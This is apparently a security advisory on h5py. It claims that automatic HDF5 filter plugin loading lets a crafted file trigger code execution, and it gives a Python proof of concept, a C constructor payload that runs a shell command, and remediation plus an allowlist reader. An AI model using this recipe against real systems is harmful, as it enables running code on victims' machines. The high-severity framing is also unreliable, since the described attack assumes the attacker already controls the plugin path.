# Arbitrary Code Execution via Automatic HDF5 Filter Plugin Loading in h5py

## Target

- **Project:** h5py/h5py
- **URL:** https://github.com/h5py/h5py
- **Component:** HDF5 filter pipeline / dataset read path
- **CWE:** CWE-94 (Improper Control of Generation of Code / Code Injection)

## Severity: HIGH

## Summary

When h5py opens an HDF5 file and reads a dataset that uses a custom (non-builtin) compression filter, the underlying HDF5 library automatically searches for and loads a shared-library (`.so`/`.dll`) filter plugin from the directories on its plugin search path. h5py exposes APIs (`h5py.h5pl`) to manipulate this search path but does **nothing** to restrict or disable the automatic dynamic loading itself. A crafted HDF5 file specifying a custom filter ID will therefore cause HDF5 to load and execute arbitrary code from a shared library placed on the plugin search path -- which can be controlled via the `HDF5_PLUGIN_PATH` environment variable or through the `h5py.h5pl.append()`/`prepend()` APIs.

## Vulnerable Code

### File: `h5py/h5py/h5z.pyx` (lines 102-121)

```python
@with_phil
def register_filter(uintptr_t cls_pointer_address):
    '''(INT cls_pointer_address) => BOOL

    Register a new filter from the memory address of a buffer containing a
    ``H5Z_class1_t`` or ``H5Z_class2_t`` data structure describing the filter.

    `cls_pointer_address` can be retrieved from a HDF5 filter plugin dynamic
    library::

        import ctypes
        filter_clib = ctypes.CDLL("/path/to/my_hdf5_filter_plugin.so")
        filter_clib.H5PLget_plugin_info.restype = ctypes.c_void_p
        h5py.h5z.register_filter(filter_clib.H5PLget_plugin_info())
    '''
    return H5Zregister(cls_pointer_address) >= 0
```

### File: `h5py/h5py/h5pl.pyx` (lines 20-25)

```python
cpdef append(const char* search_path):
    """(STRING search_path)

    Add a directory to the end of the plugin search path.
    """
    H5PLappend(search_path)
```

### File: `h5py/h5py/_hl/filters.py` (lines 295-299)

When a dataset is created with an integer filter ID, h5py passes it directly to HDF5:

```python
elif isinstance(compression, int):
    if not allow_unknown_filter and not h5z.filter_avail(compression):
        raise ValueError("Unknown compression filter number: %s" % compression)
    plist.set_filter(compression, h5z.FLAG_OPTIONAL, compression_opts)
```

### Automatic Plugin Loading (HDF5 library behavior)

When `H5Dread()` is called on a dataset whose filter ID is not currently registered, HDF5 searches the plugin path for `.so`/`.dll` files, loads them via `dlopen()`, calls `H5PLget_plugin_info()` to obtain the filter class, and registers the filter automatically. This happens transparently inside:

- `h5py/h5py/_proxy.templ.pyx` line 120: `H5Dread(dset, mtype, mspace, fspace, dxpl, progbuf)`
- `h5py/h5py/_proxy.templ.pyx` line 151: `H5Dread(dset, dstype, cspace, fspace, dxpl, conv_buf)`

## Exploitation

### Attack Scenario 1: Crafted HDF5 file + environment manipulation

1. An attacker sets `HDF5_PLUGIN_PATH` to a directory they control (e.g., via `.bashrc` manipulation, Docker environment, or CI/CD configuration)
2. They place a malicious `.so` file in that directory implementing the `H5PLget_plugin_info` symbol
3. They provide a crafted HDF5 file with a dataset using a custom filter ID matching their plugin
4.
   When the victim opens the file and reads the dataset with h5py, the malicious shared library is automatically loaded and its code executes

### Attack Scenario 2: `h5pl` API abuse in shared environments

In applications where users can influence the plugin path via `h5py.h5pl.append()` before file loading:

```python
import h5py

# Attacker injects a malicious plugin path
h5py.h5pl.append(b'/attacker/controlled/path')

# Later, when legitimate code reads a crafted HDF5 file:
with h5py.File('crafted.h5', 'r') as f:
    data = f['dataset'][:]  # Triggers plugin loading -> RCE
```

### Proof of Concept

```python
import os

import h5py
import numpy as np

# Step 1: Create a malicious shared library (filter plugin).
# In practice, compile a .so exposing the H5PLget_plugin_info symbol that
# runs arbitrary code. For demonstration, this would be:
#   gcc -shared -o malicious_filter.so -fPIC malicious_filter.c
# where malicious_filter.c contains:
#   #include <stdlib.h>
#   void __attribute__((constructor)) init() { system("id > /tmp/pwned"); }

# Step 2: Set the plugin path
os.environ['HDF5_PLUGIN_PATH'] = '/tmp/malicious_plugins'

# Step 3: Create an HDF5 file with a custom filter ID.
# Avoid 32000, which h5py itself registers for its bundled LZF filter;
# use an ID that is not already registered in-process.
CUSTOM_FILTER_ID = 32768

with h5py.File('/tmp/crafted.h5', 'w') as f:
    # allow_unknown_filter bypasses the availability check during creation
    f.create_dataset(
        'payload',
        data=np.zeros(100),
        compression=CUSTOM_FILTER_ID,
        compression_opts=(0,),
        chunks=(100,),
        allow_unknown_filter=True,
    )

# Step 4: When any user reads this file, the filter plugin is loaded
with h5py.File('/tmp/crafted.h5', 'r') as f:
    data = f['payload'][:]  # Triggers automatic plugin search and dlopen()
```

## Impact

- **Arbitrary code execution** in the context of the process reading the HDF5 file
- This is particularly dangerous in:
  - Data science pipelines that process untrusted HDF5 files
  - ML model loading (Keras/TensorFlow models are stored as HDF5)
  - Scientific data sharing workflows
  - Jupyter notebook environments processing external data
- h5py provides no mechanism to disable automatic filter plugin loading
- The `allow_unknown_filter=True` parameter on dataset creation is designed for this workflow, explicitly supporting the use case

## Remediation

1. **Provide an option to disable automatic filter plugin loading** when opening files for reading. HDF5 1.10+ supports `H5PLset_loading_state()` to disable plugin loading.
2. **Add a security warning** in the documentation about the risks of processing untrusted HDF5 files
3. **Consider defaulting to disabled plugin loading** for read-only file access, requiring explicit opt-in
4. **Validate or restrict plugin paths** added via `h5pl.append()`/`prepend()`

## References

- HDF5 Dynamic Plugin Loading: https://docs.hdfgroup.org/hdf5/develop/group___h5_p_l.html
- HDF5 Filter Plugins: https://github.com/HDFGroup/hdf5_plugins
- h5py filter documentation: https://docs.h5py.org/en/stable/high/dataset.html#filter-pipeline
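## Appendix: Caller-Side Mitigation Sketch

Until h5py offers a way to disable automatic plugin loading, an application can defend itself by inspecting a dataset's filter pipeline (via h5py's low-level property-list API) and refusing to read anything whose filter ID is outside an explicit allowlist, so an unknown ID never reaches `H5Dread()` and never triggers the plugin search. The sketch below is a minimal illustration, not part of h5py; the names `safe_read` and `ALLOWED_FILTERS` are hypothetical.

```python
import h5py

# Allowlist of filter IDs considered safe: the HDF5 builtins plus h5py's
# bundled LZF filter. Anything else is treated as a potential plugin-load
# trigger and rejected.
ALLOWED_FILTERS = {
    h5py.h5z.FILTER_DEFLATE,
    h5py.h5z.FILTER_SHUFFLE,
    h5py.h5z.FILTER_FLETCHER32,
    h5py.h5z.FILTER_SZIP,
    h5py.h5z.FILTER_NBIT,
    h5py.h5z.FILTER_SCALEOFFSET,
    h5py.h5z.FILTER_LZF,  # registered by h5py itself (ID 32000)
}

def safe_read(filename, dataset_name):
    """Read a dataset only if every filter in its pipeline is allowlisted."""
    with h5py.File(filename, 'r') as f:
        dset = f[dataset_name]
        dcpl = dset.id.get_create_plist()  # dataset creation property list
        for i in range(dcpl.get_nfilters()):
            # get_filter() returns (filter_code, flags, values, name)
            filter_id = dcpl.get_filter(i)[0]
            if filter_id not in ALLOWED_FILTERS:
                raise ValueError(
                    f"refusing to read {dataset_name!r}: "
                    f"non-allowlisted filter ID {filter_id}"
                )
        return dset[...]
```

Note that this only guards reads going through `safe_read`; it does not stop HDF5 from loading plugins on other code paths, so it complements rather than replaces the remediations above.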